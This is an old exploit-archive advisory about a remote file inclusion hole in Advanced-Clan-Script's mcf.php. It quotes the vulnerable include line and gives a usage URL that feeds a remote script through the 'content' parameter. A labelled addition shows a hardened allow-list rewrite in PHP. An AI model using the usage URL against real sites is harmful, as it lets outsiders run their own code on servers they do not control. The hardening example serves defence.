# Title : Advanced-Clan-Script <= 3.4 (mcf.php) Remote File Include Vulnerability
# Published : 2006-09-24
# Author : xdh


*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    discovered by xdh
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    {Critical Level}: Dangerous   
*    {Class}: Remote File Inclusion                                           
*    {Vendor site}: http://avc.x.philipwette.de/
*    {Version}: AdVancedClanscript < 3.4       
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* Vuln:
* Filename: mcf.php
* Line 70: include("$content");
*        
*    usage: http://www.test.com/path/mcf.php?content=xpl
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    greetz 2 morgan, nethug-47, r00t, tz4r, x2k,
*         jack, id and many others  
*          /server -m irc.root.net.ve -j #morgan
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
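
Added example, not part of the original advisory and not AdVancedClanscript code: the include pattern reported at mcf.php line 70 next to a hardened form that treats the request parameter only as a lookup key. The page names, file names and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example; page names and file paths below are hypothetical.

// Pattern reported at mcf.php line 70: the request-supplied value reaches
// include() unchanged, so the caller decides what PHP loads and executes.
//   include("$content");

// Hardened form: the parameter selects an entry from a fixed table of local files.
const PAGES = [
    'news'    => 'news.php',
    'members' => 'members.php',
    'wars'    => 'wars.php',
];

function resolve_content($requested, string $baseDir): ?string
{
    // Reject non-strings (e.g. ?content[]=x) and any key not in the table.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $root = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit under the base directory.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_content($_GET['content'] ?? 'news', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) blocks URL wrappers in include() as a second layer. It does not stop inclusion of local paths, so the lookup table is still needed.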

# www.Syue.com [2006-09-24]